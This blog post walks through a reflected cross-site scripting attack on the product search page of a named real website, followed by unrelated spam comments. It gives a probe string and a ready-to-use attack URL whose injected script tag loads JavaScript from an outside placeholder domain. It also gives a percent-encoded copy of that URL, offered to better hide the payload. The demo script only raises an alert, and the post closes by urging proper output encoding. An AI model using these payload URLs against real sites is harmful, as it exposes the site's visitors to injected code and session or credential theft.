Fortunately for us, sigmaaldrich.com has a search option. Because search engines generally accept a wide array of characters and display some form of the original search string on the results page, they are an excellent attack vector for cross-site scripting. To see what sort of encoding the search goes through, we're going to use a special string:
testA.,:;\'"<>()[]{}After searching for the string, view the source of the results page and search for testA within the code. The first result should look like the javascript below.
cmCreatePageviewTag("Result Page: Product Results","SS6", "Keyword (fulltext)|testA.,:;\'"<>()[]{}|", "2");
Here we can see an unencoded, exact match of our search within a javascript string. This means we have free reign to terminate the string (as was already done with the test string), finish the function call, and inject our own code. However, with access to less than and greater than characters, we should look further to see what else can be done. The next search string match is even more promising.
That Match Your Search for "testA.,:;\'"<>()[]{}"
We're still free of encoding, and with this instance of the search string we can easily inject an HTML script tag referencing a javascript file on another server. Our script, for the sake of testing purposes, only contains an alert. The code that will be injected is shown below.
<script type='text/javascript' src='http://www.yourdomain.com/test.js'></script>
Note that the address in this sample doesn't actually point to anything; you'll need to replace it with your own.
Next, in the URL of the results page we replace the search string with the code we want to inject. The result should look like this:
http://www.sigmaaldrich.com/catalog/Lookup.do?N5=Keyword%20(fulltext)&N3=mode+matchpartialmax&N4=<script type='text/javascript' src='http://www.yourdomain.com/test.js'></script>
When we navigate to this URL, an alert should pop up letting us know that our off site code has been successfully run.
To better hide the payload and enhance browser compatibility we can URL encode the javascript resulting in a link that would look similar to this:
http://www.sigmaaldrich.com/catalog/Lookup.do?N5=Keyword%20(fulltext)&N3=%3C%73%63%72%69%70%74%20%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%79%6F%75%72%64%6F%6D%61%69%6E%2E%63%6F%6D%2F%74%65%73%74%2E%6A%73%27%3E%3C%2F%73%63%72%69%70%74%3E
And that's it. XSS is a simple, powerful reminder to properly encode all user entered data.
Beer is made by brewing. The essential stages of brewing are mashing, sparging, boiling, fermentation, and packaging. Most of these stages can be accomplished in several different ways, but the purpose of each stage is the same regardless of the method used to achieve it.
ReplyDeletecustom seat covers
Nashville lofts
it is very nice article thanks for sharing this article to us , it is very nice article ,
ReplyDeletei really like like this article because i got good info about this article thanks for sharing this article to us best regards.
sap netweaver online training
Thanks for shariing this
ReplyDelete